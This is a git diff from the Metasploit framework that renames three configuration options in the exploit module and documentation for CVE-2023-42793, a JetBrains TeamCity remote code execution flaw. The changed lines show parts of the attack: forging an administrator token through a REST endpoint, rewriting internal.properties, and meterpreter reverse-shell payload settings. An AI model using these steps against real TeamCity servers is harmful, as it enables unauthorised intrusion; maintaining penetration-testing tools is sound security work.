diff --git a/documentation/modules/exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793.md b/documentation/modules/exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793.md index da87c5bdc6f6..83074af4de1a 100644 --- a/documentation/modules/exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793.md +++ b/documentation/modules/exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793.md @@ -39,16 +39,16 @@ msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793): - Name Current Setting Required Description - ---- --------------- -------- ----------- - Proxies no A proxy chain of format type:host:port[,type:host:port][...] - RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html - RPORT 8111 yes The target port (TCP) - SSL false no Negotiate SSL/TLS for outgoing connections - TeamCityAdminID 1 yes The ID of an administrator account to authenticate as - TeamCityRetryCount 10 yes The number of times to retry reading the internal.properties file - TeamCityRetryWait 3 yes The number of seconds to wait between retry reading the internal.properties file - VHOST no HTTP server virtual host + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html + RPORT 8111 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + TEAMCITY_ADMIN_ID 1 yes The ID of an administrator account to authenticate as + TEAMCITY_RETRY_COUNT 10 yes The number of times to retry reading the internal.properties file + TEAMCITY_RETRY_WAIT 3 yes The number of seconds to wait between retry reading the internal.properties file + VHOST no HTTP server virtual host Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp): @@ -118,16 +118,16 @@ msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793): - Name Current Setting Required Description - ---- --------------- -------- ----------- - Proxies no A proxy chain of format type:host:port[,type:host:port][...] - RHOSTS 192.168.86.43 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html - RPORT 8111 yes The target port (TCP) - SSL false no Negotiate SSL/TLS for outgoing connections - TeamCityAdminID 1 yes The ID of an administrator account to authenticate as - TeamCityRetryCount 10 yes The number of times to retry reading the internal.properties file - TeamCityRetryWait 3 yes The number of seconds to wait between retry reading the internal.properties file - VHOST no HTTP server virtual host + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS 192.168.86.43 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html + RPORT 8111 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + TEAMCITY_ADMIN_ID 1 yes The ID of an administrator account to authenticate as + TEAMCITY_RETRY_COUNT 10 yes The number of times to retry reading the internal.properties file + TEAMCITY_RETRY_WAIT 3 yes The number of seconds to wait between retry reading the internal.properties file + VHOST no HTTP server virtual host Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp): diff --git a/modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2023_42793.rb b/modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2023_42793.rb index a05ac5c1cb2e..f880a741688d 100644 --- a/modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2023_42793.rb +++ b/modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2023_42793.rb @@ -62,10 +62,10 @@ def initialize(info = {}) # By default TeamCity listens for HTTP requests on TCP port 8111. Opt::RPORT(8111), # The first user created during installation is an administrator account, so the ID will be 1. - OptInt.new('TeamCityAdminID', [true, 'The ID of an administrator account to authenticate as', 1]), + OptInt.new('TEAMCITY_ADMIN_ID', [true, 'The ID of an administrator account to authenticate as', 1]), # We modify a configuration file, we need to wait for the changes to be picked up. These options govern how we wait. - OptInt.new('TeamCityRetryCount', [true, 'The number of times to retry reading the internal.properties file', 10]), - OptInt.new('TeamCityRetryWait', [true, 'The number of seconds to wait between retry reading the internal.properties file', 3]) + OptInt.new('TEAMCITY_RETRY_COUNT', [true, 'The number of times to retry reading the internal.properties file', 10]), + OptInt.new('TEAMCITY_RETRY_WAIT', [true, 'The number of seconds to wait between retry reading the internal.properties file', 3]) ] ) end @@ -95,7 +95,7 @@ def check end def exploit - token_uri = "/app/rest/users/id:#{datastore['TeamCityAdminID']}/tokens/RPC2" + token_uri = "/app/rest/users/id:#{datastore['TEAMCITY_ADMIN_ID']}/tokens/RPC2" res = send_request_cgi( 'method' => 'POST', @@ -121,9 +121,9 @@ def exploit unless res&.code == 200 # One reason token creation may fail is if we use a user ID for a user that does not exist. We detect that here - # and instruct the user to choose a new ID via the TeamCityAdminID option. + # and instruct the user to choose a new ID via the TEAMCITY_ADMIN_ID option. if res && (res.code == 404) && res.body.include?('User not found') - print_warning('User not found, try setting the TeamCityAdminID option to a different ID.') + print_warning('User not found, try setting the TEAMCITY_ADMIN_ID option to a different ID.') end fail_with(Failure::UnexpectedReply, 'Failed to create an authentication token.') @@ -219,15 +219,15 @@ def modify_internal_properties(token, key, value) unless res&.code == 200 # If we are using an authentication for a non admin user, we cannot modify the internal.properties file. The - # server will return a 302 redirect if this is the case. Choose a different TeamCityAdminID and try again. + # server will return a 302 redirect if this is the case. Choose a different TEAMCITY_ADMIN_ID and try again. if res&.code == 302 - print_warning('This user is not an administrator, try setting the TeamCityAdminID option to a different ID.') + print_warning('This user is not an administrator, try setting the TEAMCITY_ADMIN_ID option to a different ID.') end return false end - 0.upto datastore['TeamCityRetryCount'] do + 0.upto datastore['TEAMCITY_RETRY_COUNT'] do res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri('/admin/admin.html'), @@ -249,7 +249,7 @@ def modify_internal_properties(token, key, value) print_status('Waiting for config change to be picked up...') - sleep(datastore['TeamCityRetryWait']) + sleep(datastore['TEAMCITY_RETRY_WAIT']) end true